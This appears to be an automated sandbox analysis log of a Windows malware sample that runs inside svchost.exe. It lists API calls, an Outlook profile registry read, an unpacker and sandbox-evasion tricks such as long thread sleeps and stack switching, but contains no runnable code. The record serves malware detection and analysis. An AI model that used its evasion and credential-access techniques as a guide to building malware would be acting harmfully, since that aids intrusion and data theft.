Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 8JVG9KELay.exe

Static file information: File size 1085952 > 1048576

Source: 8JVG9KELay.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8JVG9KELay.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8JVG9KELay.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8JVG9KELay.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8JVG9KELay.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8JVG9KELay.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 8JVG9KELay.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: svchost.exe, 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 8JVG9KELay.exe, 00000000.00000003.1314641117.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, 8JVG9KELay.exe, 00000000.00000003.1318110678.00000000036B0000.00000004.00001000.00020000.00000000.sdmp

Source: 8JVG9KELay.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8JVG9KELay.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8JVG9KELay.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8JVG9KELay.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8JVG9KELay.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.3.svchost.exe.346d000.0.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 1.2.svchost.exe.5970000.3.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0085C304 LoadLibraryA,GetProcAddress,

0_2_0085C304

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007EC590 push eax; retn 007Eh	0_2_007EC599
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00808B85 push ecx; ret	0_2_00808B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041C40C push cs; iretd	1_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00423149 push eax; ret	1_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041C50E push cs; iretd	1_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004231C8 push eax; ret	1_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E21D push ecx; ret	1_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041C6BE push ebx; ret	1_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_053FE558 push eax; iretd	1_2_053FE559
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A3438 pushad ; iretd	1_2_087A3569

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_007E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_007E4A35
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_008655FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_008655FD

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008033C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_008033C7

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\8JVG9KELay.exe

API/Special instruction interceptor: Address: 7D3204

Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5310000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

1_2_004019F0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599627	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599387	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599276	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599057	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598201	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597963	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596498	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595782	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594280	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594157	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 1585			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 8248			Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe

API coverage: 5.1 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8524	Thread sleep count: 1585 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8524	Thread sleep count: 8248 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599627s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599387s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599276s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599168s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -599057s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597963s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596498s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -596032s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595907s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595782s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594280s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 8520	Thread sleep time: -594157s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00844696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00844696
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0084C9C7
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084C93C FindFirstFileW,FindClose,	0_2_0084C93C
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0084F200
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0084F35D
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0084F65E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00843A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00843A2B
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00843D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00843D4E
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_0084BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0084BF27

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_007E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007E4AFE

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599627	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599387	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599276	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599057	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598201	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598078	Jump to behavior
